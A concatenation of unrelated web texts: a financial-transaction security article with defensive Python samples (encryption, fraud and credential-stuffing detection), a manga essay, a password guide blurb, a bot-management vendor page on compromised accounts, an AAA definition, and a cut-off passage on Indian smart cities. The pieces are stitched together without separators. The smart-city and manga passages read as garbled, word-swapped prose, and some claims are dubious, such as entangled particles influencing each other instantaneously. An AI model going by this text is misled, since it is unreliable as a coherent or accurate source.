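ciphertext = cipher.encrypt(pan.encode("utf-8"))

# Only services holding the key can recover the original value.
assert cipher.decrypt(ciphertext).decode("utf-8") == pan
print("value stored at rest:", ciphertext[:24], b"...")
```

Many organizations pair this kind of encryption with tokenization (discussed later in this article) so that most systems never handle the real card number at all.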
Common hacking techniques in 2024

As technology advances, so do the methods employed by cybercriminals to exploit vulnerabilities in financial systems, personal data, and organizational infrastructures. In 2024, the landscape of cyber threats is more complex and sophisticated than ever before, driven by the proliferation of digital transformation and the increasing interconnectedness of devices and services.

Phishing and social engineering

Phishing and social engineering attacks are among the most prevalent threats to financial transactions. Cybercriminals use various techniques to trick individuals into revealing sensitive information such as passwords, credit card numbers, and personal identification information.

Spear phishing: unlike regular phishing, which casts a wide net, spear phishing targets specific individuals or organizations. Attackers often gather detailed information about their targets to craft highly personalized and convincing emails. These emails may appear to come from a trusted source, such as a colleague, bank, or service provider, making them more difficult to detect. Once the victim clicks on a malicious link or attachment, their credentials or personal information can be harvested.

Vishing: voice phishing, or vishing, involves using phone calls to deceive individuals into revealing personal or financial information. Attackers might pose as representatives from banks, credit card companies, or government agencies. They often create a sense of urgency or fear to prompt immediate action, such as claiming that the victim's account has been compromised and requesting verification of personal details.

Baiting: this technique uses enticing offers or promises to lure victims into providing personal information. Baiting can occur online, through pop-up ads or malicious websites offering free downloads, or offline, through physical media like infected USB drives left in public places. Once the victim takes the bait, malware may be installed on their device, or they may be directed to a fraudulent site where their information is collected.

Malware and ransomware

Malware and ransomware attacks pose significant threats to financial systems, often resulting in substantial financial and reputational damage.

Data-stealing malware: various types of malware, such as keyloggers, spyware, and Trojans, are used to extract sensitive information from infected systems. For example, keyloggers record keystrokes to capture login credentials, while spyware monitors user activity and collects data without the user's knowledge. Once the data is stolen, it can be sold on the dark web or used for further fraudulent activities.

Ransomware: ransomware encrypts the victim's data, rendering it inaccessible until a ransom is paid to the attacker. Financial institutions are particularly vulnerable to ransomware due to the critical nature of their data. Attackers often demand payment in cryptocurrencies to remain anonymous. Even if the ransom is paid, there is no guarantee that the data will be decrypted, and the organization may still suffer downtime, loss of data, and reputational damage.

Man-in-the-middle (MitM) attacks

Man-in-the-middle attacks occur when an attacker intercepts and potentially alters the communication between two parties. This can compromise the integrity and confidentiality of financial transactions.

Eavesdropping: in an eavesdropping MitM attack, the attacker listens in on the communication between two parties. This can occur over unsecured Wi-Fi networks, where attackers use tools to capture data packets transmitted between devices.
Sensitive information such as login credentials and account details can be intercepted and used for fraudulent activities.

Session hijacking: in a session hijacking attack, the attacker takes control of a user's session with a financial service or website. This is often done by stealing session cookies that store authentication information. Once the attacker has control, they can perform unauthorized transactions, change account settings, or steal additional information.

Data manipulation: attackers can also alter the data being transmitted between two parties. For instance, during a financial transaction, the attacker could modify the transaction details, such as the recipient's account number, resulting in the funds being transferred to the attacker's account instead.

Insider threats

Insider threats arise from employees, contractors, or partners who misuse their access to financial systems for malicious purposes. These threats can be particularly difficult to detect and mitigate because the insiders have legitimate access to sensitive information and systems.

Data theft: insiders may steal sensitive financial information, such as customer data, trade secrets, or proprietary algorithms. This data can be sold to competitors or used for personal gain. Data theft can have severe consequences, including regulatory fines, loss of customer trust, and competitive disadvantages.

Insider fraud: insider fraud involves manipulating financial records, creating fake accounts, or processing unauthorized transactions. This type of fraud can go unnoticed for extended periods, especially if the insider has control over the auditing processes. Fraudulent activities can result in significant financial losses and legal repercussions.

Sabotage: insiders with malicious intent may deliberately disrupt operations by damaging systems, deleting critical data, or introducing malware. Sabotage can lead to downtime, loss of productivity, and costly recovery efforts. It can also erode trust among customers and stakeholders if they perceive the organization as unable to secure its operations.

To mitigate these threats, financial institutions must implement comprehensive security measures, including:
- Advanced threat detection: using machine learning and AI-based solutions to identify and respond to sophisticated threats in real time.
- Employee training: regularly educating employees about security best practices, phishing awareness, and the importance of reporting suspicious activities.
- Access controls: implementing strict access controls and monitoring to limit access to sensitive information based on the principle of least privilege.
- Incident response plans: developing and testing robust incident response plans to quickly contain and remediate security breaches.
- Regular audits: conducting regular security audits and assessments to identify vulnerabilities and ensure compliance with regulatory requirements.

What else could you do?

Securing financial transactions is a multifaceted endeavor that involves implementing a range of best practices to protect sensitive data and prevent fraud. Here's an in-depth look at essential practices to enhance the security of financial transactions.

Authentication and authorization

Effective authentication and authorization mechanisms are foundational to securing financial transactions. These practices ensure that only authorized individuals have access to sensitive financial data and systems.

Multi-factor authentication (MFA): MFA requires users to provide two or more verification factors to gain access to systems or perform transactions.
This might include something the user knows (like a password), something the user has (like a smartphone or security token), or something the user is (like biometric data). By combining these factors, MFA adds an extra layer of security that makes it significantly harder for attackers to gain unauthorized access. For example, even if an attacker obtains a user's password, they would still need the second factor (such as a one-time passcode sent to the user's phone) to complete the authentication process.

Biometric authentication: this method leverages unique biological traits such as fingerprints, facial recognition, or retinal scans to authenticate users. Biometric authentication provides a higher level of security compared to traditional passwords, as biological traits are much harder to replicate or steal. For financial transactions, biometric authentication can be used in conjunction with MFA to enhance security further.

Role-based access control (RBAC): RBAC involves assigning permissions based on a user's role within the organization. This means that employees only have access to the information and systems necessary for their job functions. For example, a customer service representative may have access to customer account information but not to financial transaction records. RBAC helps minimize the risk of unauthorized access and reduces the potential impact of insider threats.

Encryption and data protection

Encryption is a crucial technology for protecting transaction data both during transmission and when stored. Proper encryption practices ensure that sensitive financial data remains confidential and secure.

SSL/TLS: Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are protocols used to encrypt data transmitted over the internet. SSL/TLS ensures that data exchanged between users and websites is encrypted, preventing interception and eavesdropping by malicious actors. For financial transactions, SSL/TLS is essential for securing online banking, e-commerce sites, and payment processing systems.

End-to-end encryption: this method ensures that data is encrypted from the point of origin to the point of destination, meaning that only the intended recipient can decrypt and access the data. End-to-end encryption is crucial for protecting sensitive information during its entire journey, from the user's device to the financial institution's systems. This approach minimizes the risk of data being intercepted or altered in transit.

Key management practices: effective key management is vital for safeguarding encryption keys, which are used to encrypt and decrypt data. Organizations should implement robust key management practices, including secure key storage, regular key rotation, and access controls to ensure that encryption keys are protected from unauthorized access. Additionally, backup and recovery procedures should be in place to handle key loss or corruption.

Fraud detection and prevention

Implementing advanced fraud detection and prevention technologies helps organizations identify and mitigate fraudulent activities in real time. The most important methods include the following.

Machine learning algorithms: machine learning algorithms analyze huge volumes of transaction data to identify patterns and anomalies indicative of fraudulent activity. These algorithms can detect unusual behavior that may not be apparent through traditional rule-based systems.
For example, machine learning can identify deviations from a user's normal transaction patterns, such as an unusual spending spree or transactions from unexpected locations.

Anomaly detection: anomaly detection involves monitoring transactions for signs of irregular behavior that could indicate fraud. This can include transactions that deviate from established patterns, such as unusually large transactions or transactions occurring outside of regular business hours. Anomaly detection systems can generate alerts for further investigation, allowing organizations to respond quickly to potential threats.

Real-time monitoring systems: continuous monitoring of transaction data helps organizations detect and respond to threats promptly. Real-time monitoring systems analyze transaction data as it occurs, providing immediate insight into potential fraud or security breaches. This allows for rapid response and mitigation, reducing the impact of fraudulent activities.

Secure payment gateways and APIs

Payment gateways and APIs play a critical role in processing financial transactions and must be secured to prevent unauthorized access and data breaches.

Tokenization: tokenization replaces sensitive data, such as credit card numbers, with unique identification symbols (tokens) that have no intrinsic value. Tokens are used in place of actual data during transactions, reducing the risk of sensitive information being exposed. Even if a token is intercepted, it cannot be used outside of its intended context, protecting the underlying data from theft.

API security best practices: APIs facilitate communication between different systems and applications, and securing them is essential for protecting financial transactions. Best practices for API security include secure coding practices such as input validation and error handling, regular security testing, and monitoring of API traffic for suspicious activity. Additionally, APIs should use authentication and authorization mechanisms to ensure that only authorized users and systems can access them.

Incident response and recovery

A robust incident response plan is another crucial element in protecting financial institutions, minimizing the impact of security breaches and ensuring a swift recovery.

Preparation: establishing policies and procedures for responding to security incidents is the first step in effective incident response. This includes defining roles and responsibilities, developing communication plans, and creating a comprehensive incident response strategy. Regularly updating and testing the incident response plan ensures that it remains effective and relevant.

Detection and analysis: identifying and assessing the scope and impact of an incident is critical for an effective response. Organizations should use monitoring tools and techniques to detect anomalies and potential breaches. Once an incident is detected, conducting a thorough analysis helps determine the nature of the threat, the affected systems, and the potential impact on operations.

Containment, eradication, and recovery: after identifying the incident, the next steps involve isolating affected systems to prevent further damage, removing the threat, and restoring normal operations. Containment measures might include disconnecting compromised systems from the network, while eradication involves eliminating malware or unauthorized access.
Recovery efforts focus on restoring systems and data to their normal state and validating that they are secure.

Post-incident review: analyzing the incident after recovery is essential for improving future response strategies. A post-incident review involves examining the cause of the incident, evaluating the effectiveness of the response, and identifying areas for improvement. Lessons learned from the incident should be used to update security policies, enhance training, and strengthen defenses.

User education and awareness: a crucial component in safeguarding your digital world

The digital landscape is fraught with danger, with new and evolving threats lurking behind every click. Despite enormous advances in technology and security measures, cybercriminals continue to operate with unprecedented levels of sophistication and cleverness. However, there is one crucial element that often goes unnoticed: the human factor.

Training programs: regular training programs help employees and customers understand security threats and best practices for protecting financial information. Training should cover topics such as recognizing phishing attempts, using strong passwords, and securely handling sensitive data. Interactive and engaging training methods can enhance retention and effectiveness.

Security awareness campaigns: ongoing security awareness campaigns keep security top of mind for employees and customers. This might include newsletters, webinars, workshops, and informational materials that highlight current threats and provide practical advice for staying safe. Regular updates and reminders help reinforce security practices and keep users informed about emerging threats.

Simulated phishing attacks: conducting simulated phishing attacks helps test and improve users' ability to recognize and respond to phishing attempts. These exercises provide valuable feedback on the effectiveness of training programs and identify areas where additional education may be needed. Simulated phishing attacks also raise awareness and reinforce the importance of vigilance in protecting financial information.

Quantum cryptography: methods for encrypting and transmitting data securely

Quantum cryptography represents a groundbreaking advancement in data security by harnessing the principles of quantum mechanics to create theoretically unbreakable encryption methods.

Principles of quantum cryptography: unlike classical cryptography, which relies on mathematical algorithms and computational complexity, quantum cryptography is based on the behavior of quantum particles. One key principle is quantum entanglement, where particles become interconnected and can influence each other instantaneously, regardless of distance. This property is used to create secure communication channels in which any eavesdropping attempt is immediately detectable, ensuring the integrity and confidentiality of the data being transmitted.

Quantum key distribution (QKD): a prominent application of quantum cryptography is quantum key distribution. QKD allows two parties to generate and share encryption keys securely, even in the presence of potential eavesdroppers. The security of QKD is rooted in the fact that any attempt to intercept or measure the quantum particles used in the key distribution process disturbs their state, revealing the presence of an attacker. This ensures that the keys used for encrypting and decrypting data are secure from unauthorized access.
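To give a feel for why QKD can expose an eavesdropper, here is a purely classical, toy simulation of the sifting and error-checking steps of a BB84-style protocol. It does not model real quantum hardware or any commercial QKD product; the parameters and the simple intercept-resend attacker are assumptions made only for illustration.

```python
import secrets, random

def bb84_demo(n=512, eavesdrop=False, sample_fraction=0.25):
    """Classical toy model of BB84 sifting and eavesdropper detection."""
    alice_bits  = [secrets.randbelow(2) for _ in range(n)]
    alice_bases = [secrets.randbelow(2) for _ in range(n)]  # 0 = rectilinear, 1 = diagonal

    # Optional intercept-resend attacker: measuring in the wrong basis
    # randomizes the bit that travels on to Bob.
    channel = []
    for bit, basis in zip(alice_bits, alice_bases):
        if eavesdrop and secrets.randbelow(2) != basis:
            bit = secrets.randbelow(2)
        channel.append(bit)

    # Bob measures in his own random bases; a mismatched basis gives a random result.
    bob_bases = [secrets.randbelow(2) for _ in range(n)]
    bob_bits = [
        b if ab == bb else secrets.randbelow(2)
        for b, ab, bb in zip(channel, alice_bases, bob_bases)
    ]

    # Sifting: keep only the positions where Alice's and Bob's bases matched.
    sifted = [i for i in range(n) if alice_bases[i] == bob_bases[i]]

    # Error estimation: publicly compare a random sample of the sifted bits.
    sample = set(random.sample(sifted, int(len(sifted) * sample_fraction)))
    errors = sum(alice_bits[i] != bob_bits[i] for i in sample)
    key = [alice_bits[i] for i in sifted if i not in sample]
    return errors / len(sample), key

# Without an eavesdropper the sampled error rate is ~0%; with intercept-resend
# it jumps to roughly 25%, which tells Alice and Bob the channel was tapped.
print("quiet channel error rate:", bb84_demo(eavesdrop=False)[0])
print("tapped channel error rate:", bb84_demo(eavesdrop=True)[0])
```

The real protocol relies on quantum measurement physics rather than this simulated coin-flipping, but the bookkeeping is the same: matched bases yield the shared key, and an elevated error rate on the publicly compared sample signals interception.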
Implications for financial security As quantum computing advances, it has the potential to break current cryptographic systems that are widely used to protect financial transactions. Quantum cryptography offers a future-proof solution to this challenge by providing a new level of security that is resistant to quantum attacks. Financial institutions and organizations handling sensitive data are actively researching and investing in quantum cryptography to safeguard their information against future threats. AI-driven security solutions and things you need to know Artificial Intelligence (AI) is becoming increasingly integral to enhancing security measures, offering sophisticated tools for predictive analytics and automated threat detection. Predictive analytics: AI-driven predictive analytics uses machine learning algorithms to analyze historical data and identify patterns that may indicate future threats. By analyzing vast amounts of transaction data, AI can predict potential security breaches or fraudulent activities before they occur. This proactive approach allows organizations to address vulnerabilities and mitigate risks before they result in significant damage. Automated threat detection: AI systems can continuously monitor and analyze transaction data in real-time to detect anomalies and potential threats. Machine learning algorithms can identify unusual patterns or behaviors that may indicate fraudulent activities, such as unexpected transactions or deviations from established spending patterns. Automated threat detection systems can generate alerts and initiate response actions without human intervention, improving the speed and accuracy of threat responses. Behavioral biometrics: AI can also enhance security through behavioral biometrics, which analyzes patterns in user behavior, such as typing speed, mouse movements, and navigation habits. By creating unique behavioral profiles for users, AI systems can detect deviations that may indicate fraudulent activity or account takeovers. This adds an additional layer of security beyond traditional authentication methods. Decentralized Finance (DeFi) security The rise of Decentralized Finance (DeFi) introduces new security challenges and opportunities as financial transactions move from traditional, centralized systems to decentralized platforms. Smart contract security: DeFi platforms often rely on smart contracts—self-executing contracts with the terms of the agreement directly written into code. While smart contracts can automate transactions and reduce the need for intermediaries, they also present security risks. Vulnerabilities in smart contract code can be exploited by attackers to manipulate or steal funds. Ensuring the security of smart contracts involves thorough code reviews, auditing, and testing to identify and address potential weaknesses. Decentralized Exchanges (DEXs): Decentralized exchanges, which facilitate peer-to-peer trading of digital assets without a central authority, are a core component of DeFi. However, their decentralized nature can make them more susceptible to security risks, such as front-running, liquidity issues, and hacking attacks. Securing DEXs involves implementing robust security measures, such as liquidity management strategies, transaction monitoring, and multi-signature wallets to protect user funds. Regulatory and compliance considerations: As DeFi platforms gain traction, regulatory and compliance considerations are becoming increasingly important. 
Ensuring that DeFi platforms adhere to relevant regulations and standards can help mitigate legal and security risks. This includes compliance with anti-money laundering (AML) and know-your-customer (KYC) requirements, which can help prevent illicit activities and protect users. Securing financial transactions is a multifaceted and ongoing challenge. As technology evolves, so do the methods and strategies used to protect sensitive financial information. By staying abreast of emerging trends and technologies—such as quantum cryptography, AI-driven security solutions, and DeFi security measures—organizations can better safeguard their financial operations against evolving threats.
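As a concrete illustration of the anomaly detection and AI-driven monitoring ideas discussed above, the sketch below flags card transactions that deviate sharply from a customer's history using simple statistical rules. Production systems use trained models and far richer features; the thresholds, field names, and sample data here are assumptions made for the example.

```python
from dataclasses import dataclass
from statistics import mean, stdev

@dataclass
class Transaction:
    user: str
    amount: float
    hour: int       # 0-23, local time of the transaction
    country: str

def anomaly_reasons(history: list[Transaction], candidate: Transaction,
                    z_threshold: float = 3.0) -> list[str]:
    """Return human-readable reasons the candidate transaction looks unusual."""
    reasons = []
    amounts = [t.amount for t in history]
    if len(amounts) >= 5:
        mu, sigma = mean(amounts), stdev(amounts)
        if sigma > 0 and (candidate.amount - mu) / sigma > z_threshold:
            reasons.append(f"amount {candidate.amount:.2f} is more than "
                           f"{z_threshold} std devs above this user's norm")
    if candidate.country not in {t.country for t in history}:
        reasons.append(f"first transaction seen from {candidate.country}")
    if candidate.hour not in {t.hour for t in history} and not (8 <= candidate.hour <= 20):
        reasons.append(f"unusual time of day ({candidate.hour}:00)")
    return reasons

# Illustrative data: a user who normally spends small amounts at midday in one country.
history = [Transaction("alice", 40 + i % 20, 12, "US") for i in range(30)]
print(anomaly_reasons(history, Transaction("alice", 950.0, 3, "RO")))
```

In practice the same per-user baseline idea is extended with model-based scoring and fed into the real-time monitoring and alerting pipelines described earlier.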
Mangafreak Madness Japanese comics, commonly known as manga, have taken the world by storm, captivating audiences from diverse cultural backgrounds and influencing various aspects of global pop culture. From their unique visual style to compelling storytelling, manga has left an indelible mark on entertainment industries worldwide. The Rise of Japanese Comics (Manga) Mangafreak ‘s journey traces back to the late 19th century, with its roots in traditional Japanese art forms. However, it wasn’t until the post-World War II era that manga began to flourish, with the medium evolving rapidly to cater to different age groups and genres. Characteristics of Manga Manga boasts a distinct visual style. This style is characterized by exaggerated facial expressions. Dynamic action sequences are also prominent. Intricate details adorn the artwork. Mangafreak often employs unconventional storytelling techniques, such as nonlinear narratives and intricate plotlines, keeping readers engaged and intrigued. Influence of Manga on Global Pop Culture The impact of mangafreak on global pop culture extends beyond its home country of Japan, permeating various forms of media and entertainment. Many popular manga series have been adapted into anime, animated television shows or films, further expanding their reach and popularity among international audiences. Manga’s influence is prominently visible in cosplay culture, where fans dress up as their favorite characters from manga and anime conventions worldwide. Dedicated fan communities, both online and offline, play a crucial role in fostering a sense of belonging and shared enthusiasm for manga and its related content. Impact on Entertainment Industry Manga’s influence on the entertainment industry is evident through its significant contributions to box office successes and merchandising opportunities. Box Office Successes Numerous manga adaptations have achieved commercial success at the box office, attracting a diverse audience and generating substantial revenue. The popularity of manga has led to a plethora of merchandise, including toys, apparel, and collectibles, catering to fans’ desire to connect with their favorite series on a deeper level. Manga’s Role in Shaping Creative Industries Manga’s influence extends beyond its immediate medium, shaping creative industries around the world and inspiring creators in various fields. Influence on Western Comics Manga’s storytelling techniques and visual aesthetics have influenced Western comics, leading to a cross-pollination of ideas and styles in the comic book industry. Inspirations in Film and Television Manga adaptations have also inspired filmmakers and television producers, resulting in live-action adaptations and thematic influences in mainstream media. Global Reach and Localization The globalization of manga has necessitated extensive translation efforts and cultural adaptations to make the medium accessible to international audiences. Dedicated teams of translators work tirelessly to translate manga into multiple languages, ensuring that fans worldwide can enjoy their favorite series. Manga publishers often make cultural adaptations to localize content for specific markets, ensuring that nuances and cultural references are accurately conveyed to readers. Manga’s Evolution in the Digital Age In recent years, manga has embraced digital platforms, with webtoons and online manga readers gaining popularity among readers worldwide. 
Webtoons and Online Platforms Digital platforms offer a convenient and accessible way for fans to read manga, with features such as online subscriptions and mobile apps enhancing the reading experience. Social Media Engagement Manga publishers and creators actively engage with fans through social media platforms, fostering a sense of community and providing updates on new releases and events. Controversies and Criticisms Despite its widespread popularity, manga has also faced criticism and controversies, particularly regarding its depiction of gender roles and instances of cultural appropriation. Depiction of Gender Roles Some manga series have been criticized for perpetuating gender stereotypes and portraying female characters in a sexualized manner, sparking debates about representation and diversity in the medium. Manga is global appeal has raised concerns about cultural appropriation, with creators and publishers facing scrutiny over their handling of cultural themes and references. The Future of Mangafreak Madness As manga continues to evolve and adapt to changing technologies and audience preferences, the future of the medium appears bright, with opportunities for expansion and innovation on the horizon. Expansion of Market The global demand for manga shows no signs of slowing down, with emerging markets and digital platforms contributing to the medium’s continued growth and popularity. Innovation in Storytelling Creators are constantly pushing the boundaries of storytelling in manga, experimenting with new genres, art styles, and narrative techniques to captivate audiences and keep the medium fresh and exciting. In conclusion, the influence of Japanese comics, or manga, on global pop culture is undeniable. Manga originated in Japan. It has gained immense popularity worldwide. Manga transcends cultural boundaries. It captivates millions of fans globally. The medium constantly evolves. It adapts to new trends and technologies. Manga influences entertainment industries. It sparks creative expression. Its impact continues to expand. The future growth of manga is promising. Is manga only popular in Japan? No, manga enjoys a global fanbase, with readers and enthusiasts from all over the world. What makes manga different from Western comics? Manga often features distinct visual styles and storytelling techniques that set it apart from Western comics. Are all manga series suitable for all ages? No, manga encompasses a wide range of genres and target demographics, with some series specifically aimed at adult audiences. How can I start reading manga? There are many online platforms and local bookstores where you can purchase or read manga, depending on your preferences. Are there any legal concerns associated with reading manga online? While there are legal platforms where you can read manga online, it’s essential to support creators and publishers by accessing content through legitimate channels.
Enterprise Password Management Guide Passwords are used in many ways to protect data, systems, and networks. For example, passwords are used to authenticate users of operating systems and applications such as e-mail, labor recording, and remote access. Passwords are also used to protect files and other stored information, such as password-protecting a single compressed file, a cryptographic key, or an encrypted hard drive. In addition, passwords are often used in less visible ways; for example, a biometric device may generate a password based on a fingerprint scan, and that password is then used for authentication. This publication provides recommendations for password management, which is the process of defining, implementing, and maintaining password policies throughout an enterprise. Effective password management reduces the risk of compromise of password-based authentication systems. The attached Zip file includes: - Intro Page.doc - Cover Sheet and Terms.pdf - Enterprise Password Management Guide.pdf
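A central theme of the guide is defining and enforcing password policy. The sketch below shows what a minimal, programmatic policy check might look like; the specific rules (length, character classes, a small deny-list) are illustrative assumptions rather than the publication's own recommendations.

```python
import re

COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "admin"}

def check_password_policy(password: str, min_length: int = 12) -> list[str]:
    """Return a list of policy violations; an empty list means the password passes."""
    violations = []
    if len(password) < min_length:
        violations.append(f"shorter than {min_length} characters")
    if password.lower() in COMMON_PASSWORDS:
        violations.append("appears on the common-password deny-list")
    for pattern, label in [(r"[a-z]", "lowercase letter"),
                           (r"[A-Z]", "uppercase letter"),
                           (r"\d", "digit"),
                           (r"[^A-Za-z0-9]", "symbol")]:
        if not re.search(pattern, password):
            violations.append(f"missing a {label}")
    return violations

print(check_password_policy("Tr0ub4dor&3"))              # fails only the length rule
print(check_password_policy("correct-Horse7-battery"))   # passes: empty list
```

A check like this would typically sit behind account-creation and password-change flows, with the policy values themselves maintained centrally as part of the enterprise password policy.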
Types of compromised accounts Email, social media, and business accounts are the most common types of compromised accounts, and they pose a big risk to sensitive data. Email accounts can be used to reset passwords for different applications, leading to privilege escalation1. When an email account is compromised, attackers can gain access to institutional data, confidential information, and personally identifiable information. Phishing attacks are the primary way email accounts are compromised, and businesses with no protection are at high risk. Social media accounts Even social media accounts with no access to sensitive data are valuable to hackers as they can provide access to personal information, which can be used for identity theft and fraud. Compromised social media accounts may display unexpected updates, and users should look for unusual activity on their accounts. Moreover, using the same password for multiple accounts can put all of a user's accounts at risk of compromise, not just their social media accounts. Financial accounts are targeted because they contain sensitive information like credit card numbers and bank account numbers that can be used to commit fraud or make purchases without permission. Again, phishing scams are a common tactic used by attackers to get people to give them their login information. How are accounts compromised? Accounts are compromised in various ways, but phishing attacks and credential theft attacks are very common. Phishing attacks are the most common path to a data breach. Attackers use fake emails and domain names to trick users into giving up their login information. Accounts can be compromised if they use a weak password, if a malicious third party has access to them, if they have a virus or malware, or if they are on a network that has been hacked. Credential stuffing attacks In a credential stuffing attack, attackers use automated tools to test a list of stolen usernames and passwords on multiple websites, because many people use the same username and password combination on more than one platform. When attackers find credentials that work, they can steal sensitive information or raise their privileges to get to even more important data. It is critical that people use a unique, strong password on every website, app, or account they use. Arkose Labs $1 Million Credential Stuffing Warranty Guarantees Success Against Volumetric Credential Stuffing Attacks $1M Credential Stuffing Warranty How to Spot Compromised Accounts Being able to spot a compromised account is crucial for preventing any damage that might occur. To spot a compromised account, businesses should monitor any suspicious activity, such as unfamiliar login locations, new devices or IP addresses, or unexpected changes in account settings. Unusual outbound traffic As they collect information, attackers will slowly send data to an outside network. The transferred data will show that outbound traffic is higher than usual, especially during off-peak hours. Unusual user activity on sensitive data Users with high privileges often access sensitive data in a predictable way, such as at a certain time or on a certain day. In a breach, an attacker might exfiltrate company data on unusual days or times. Network requests from unusual geolocations VPN or network access from unusual locations or a suspicious IP address could indicate an account compromise. 
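One way to operationalize the unusual-geolocation signal is to compare each login against the account's history, flagging new countries and physically impossible travel between consecutive logins. The sketch below is illustrative: the login records are made up, coordinates would normally come from a GeoIP database, and the speed threshold is an assumption.

```python
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

@dataclass
class Login:
    user: str
    when: datetime
    lat: float
    lon: float
    country: str

def km_between(a: Login, b: Login) -> float:
    """Great-circle distance between two logins (haversine formula)."""
    dlat, dlon = radians(b.lat - a.lat), radians(b.lon - a.lon)
    h = sin(dlat / 2) ** 2 + cos(radians(a.lat)) * cos(radians(b.lat)) * sin(dlon / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))

def flag_login(previous: Login, current: Login,
               known_countries: set[str], max_kmh: float = 900.0) -> list[str]:
    reasons = []
    if current.country not in known_countries:
        reasons.append(f"new country: {current.country}")
    hours = (current.when - previous.when).total_seconds() / 3600
    if hours > 0 and km_between(previous, current) / hours > max_kmh:
        reasons.append("impossible travel speed since last login")
    return reasons

prev = Login("bob", datetime(2024, 9, 1, 9, 0), 40.71, -74.01, "US")   # New York
curr = Login("bob", datetime(2024, 9, 1, 11, 0), 48.85, 2.35, "FR")    # Paris, 2 hours later
print(flag_login(prev, curr, known_countries={"US"}))
```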
Increased failed authentication requests During a brute-force attack, failed login attempts are detected, and account lockouts will stop these authentication attempts. But an attacker will keep trying other user accounts until they find a compromised account with credentials that work. Increased access attempts on important files Attackers may try to gain access to files that contain trade secrets and intellectual property. Unusual configuration changes Many times, attackers change system configurations to provide a backdoor for persistent access. Increased device traffic to a specific address Compromised networks and devices could become part of a botnet used in a distributed denial-of-service (DDoS). Consequences of a compromised business account Attackers often target high-privileged accounts, or the accounts of key employees, in spear-phishing attacks to gain access to sensitive business information. When successful, attackers may carry out CEO fraud, also called "whaling," data exfiltration, or install ransomware. Any of these can be devastating to a business, its employees, and its customers. Compromised business accounts can provide a way for malicious actors to impersonate legitimate employees or executives and attempt to defraud the company. This type of attack, known as CEO fraud or "whaling," can cause devastating financial and reputational damage to businesses. Companies can train their employees on how to recognize and avoid phishing emails and other types of social engineering attacks that can lead to compromised accounts. Data exfiltration is the unauthorized copying, transfer, or retrieval of data from either a server or an individual’s computer. Methods of data exfiltration include database leaks, network traffic, file sharing, and corporate email. Organizations with high-value data are particularly at risk of data exfiltration, either from outside threat actors or trusted insiders or employees. Ransomware encrypts a company's own data and prevents access to it. Most of the time, attackers try to blackmail an organization by making it pay a ransom to get its own data back. If the company doesn't pay the ransom, an attacker might threaten to publicly expose the data. How Arkose Labs Can Help The old axiom about the best offense is a good defense certainly applies to compromised accounts. Arkose Labs bot management solution combines detection with targeted attack response to catch fraud early in the customer journey, without impacting good users. Fraud and security teams gain the advanced detection power, risk insights, and option for user-friendly enforcement they need to prevent compromised accounts due to phishing attacks and credential stuffing attacks. In fact, we’re the only company with a $1 Million Credential Stuffing Warranty. To learn more, book a demo today!
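To make the failed-authentication and credential stuffing signals described earlier concrete, the sketch below counts failed logins per source IP in a sliding window and flags sources that cycle through many distinct usernames. The window size, thresholds, and log format are illustrative assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MAX_FAILURES = 20     # failed attempts allowed per source IP per window
MAX_USERNAMES = 5     # distinct usernames per source IP per window

class StuffingDetector:
    def __init__(self):
        self.attempts = defaultdict(deque)   # ip -> deque of (timestamp, username)

    def record_failure(self, ip: str, username: str, when: datetime) -> bool:
        """Record a failed login; return True if the IP now looks like credential stuffing."""
        window = self.attempts[ip]
        window.append((when, username))
        # Drop events that have aged out of the sliding window.
        while window and when - window[0][0] > WINDOW:
            window.popleft()
        distinct_users = {u for _, u in window}
        return len(window) > MAX_FAILURES or len(distinct_users) > MAX_USERNAMES

detector = StuffingDetector()
start = datetime(2024, 9, 1, 12, 0)
for i in range(8):
    flagged = detector.record_failure("203.0.113.7", f"user{i}", start + timedelta(seconds=i))
print("flagged:", flagged)   # True: eight distinct usernames from one IP within seconds
```

A real deployment would feed signals like this into rate limiting, step-up authentication, or a bot management platform rather than acting on a single heuristic.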
Authentication, Authorization and Accounting (AAA) – a functional description of a security architecture for a network. When people refer to an AAA system or a “Triple A” system, they mean a system that controls:
- Authentication – verifying that users are who they claim to be and are allowed into the system
- Authorization – determining which services each user may access and how many resources can be allocated to each user
- Accounting – tracking each user’s actual usage
“Triple A” systems are generally considered secure.
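As a rough illustration of how the three functions fit together, the toy sketch below authenticates a user, authorizes access to a service, and records an accounting entry. The users, services, and unsalted hashing are purely illustrative; this is not how a real AAA protocol such as RADIUS or TACACS+ works on the wire.

```python
import hashlib
from datetime import datetime, timezone

# Toy data stores; a real deployment would use a directory service or AAA server,
# and would never store unsalted password hashes like this.
USERS = {"alice": hashlib.sha256(b"s3cret-passphrase").hexdigest()}
PERMISSIONS = {"alice": {"vpn", "wiki"}}
ACCOUNTING_LOG = []

def authenticate(user: str, password: str) -> bool:
    return USERS.get(user) == hashlib.sha256(password.encode()).hexdigest()

def authorize(user: str, service: str) -> bool:
    return service in PERMISSIONS.get(user, set())

def account(user: str, service: str, allowed: bool) -> None:
    ACCOUNTING_LOG.append({"user": user, "service": service, "allowed": allowed,
                           "at": datetime.now(timezone.utc).isoformat()})

def access(user: str, password: str, service: str) -> bool:
    allowed = authenticate(user, password) and authorize(user, service)
    account(user, service, allowed)
    return allowed

print(access("alice", "s3cret-passphrase", "vpn"))   # True
print(access("alice", "wrong-password", "vpn"))      # False
print(ACCOUNTING_LOG)
```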
Construction of smart cities in India overlooks various difficulties owing to the alteration in the political environment, statistics, economic composition, to name a few. Smart City is a new translation of an upper-level Urban Collection. By building smart cities, the country is trying to recreate a better example for the living and also to solve the problems which have been produced in the means of continuous human occupancy. Varying from state to state, nation to nation because of the difference in the Economic Structure, Demographics, Technology, and Political Environment, Smart cities could both be Greenfield (start anew) or Brownfield (on existing ones) projects where difficulties are different in both the circumstances. The Brownfield plan or the cities with surviving infrastructure profess various socio-economic difficulties and significant dilemmas related to urbanization like the immigration from rural population to towns. Growth of urban community resulting in reduction of living spaces, many environmental concerns e.g. pollution (air, water, sound, radiation); controllable issues in depletion of natural resources; restraint in utility services (Electricity, Water quantity, Gas, etc.); problems of civic facilities (roads, waste, sanitation, sewerage, solid garbage), including growing number of social issues like crime, suicide, etc. The Greenfield project or building a futuristic Smart city from ground-zero will pose a diverse challenge of discovering reason on why and how a migrant community could be supported by providing not just amazingly done 